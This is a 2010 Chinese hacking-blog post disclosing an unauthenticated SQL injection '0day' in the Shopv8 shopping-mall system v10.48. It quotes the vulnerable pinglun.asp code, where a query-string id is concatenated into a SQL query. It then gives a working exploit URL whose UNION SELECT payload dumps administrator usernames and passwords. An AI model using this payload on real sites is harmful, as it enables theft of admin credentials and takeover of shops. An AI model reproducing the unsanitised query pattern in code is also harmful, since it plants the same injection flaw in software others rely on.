Shopv8商城系统 v10.48 0day漏洞

2010, July 19, 10:44 AM. 漏洞分析
Submitted by admin

发布作者:Lan3a  
影响版本: Shopv8商城系统 v10.48  
漏洞描述: pinglun.asp页面存在SQL注入  
Author:Lan3a

转载请注明出处:http://blog.cfyhack.cn/

前台所有程序都加了防注入代码的,所以我就不去看了。

直接翻后台的看,先看有没有不需要验证的,运气很不错,找到了。

pinglun.asp这个文件。

代码如下:


<%dim bookid,action    
pinglunid=request.QueryString("id")      直接提交    
action=request.QueryString("action")    
if action="save" then    
set rs=server.CreateObject("adodb.recordset")    
rs.open "select * from shop_pinglun where pinglunid="&pinglunid,conn,1,3    
rs("huifu")=HTMLEncode2(trim(request("huifu")))    
rs("huifudate")=now()    
rs.update    
rs.close    
set rs=nothing  
response.write "<script language=javascript>alert(’您的回复已成功提交!!’);history.go(-1);</script>"    
response.End    
end if    
%>  
<table class="tableBorder" width="90%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#FFFFFF">  
<tr>     
<td align="center" background="../images/admin_bg_1.gif"><b><font color="#ffffff">发表评论</font></b></td>  
</tr>  
<tr>     
<form name="pinglunform" method="post" action="pinglun.asp?action=save&id=<%=pinglunid%>">  
<td >     
<%set rs=server.CreateObject("adodb.recordset")    
rs.open "select * from shop_pinglun where pinglunid="&pinglunid,conn,1,3    直接传入查询    
%>  


下面直接贴 利用方法了:
http://localhost/admin/pinglun.asp?id=1%20and%2201=2%20union%20select%201,2,3,4,username,password,7,8,9,10,11%20from%20admin

Tags: shopv8

« 上一篇 | 下一篇 »

只显示10条记录相关文章
邯郸学步,shopv8的注入漏洞 (浏览: 16071, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):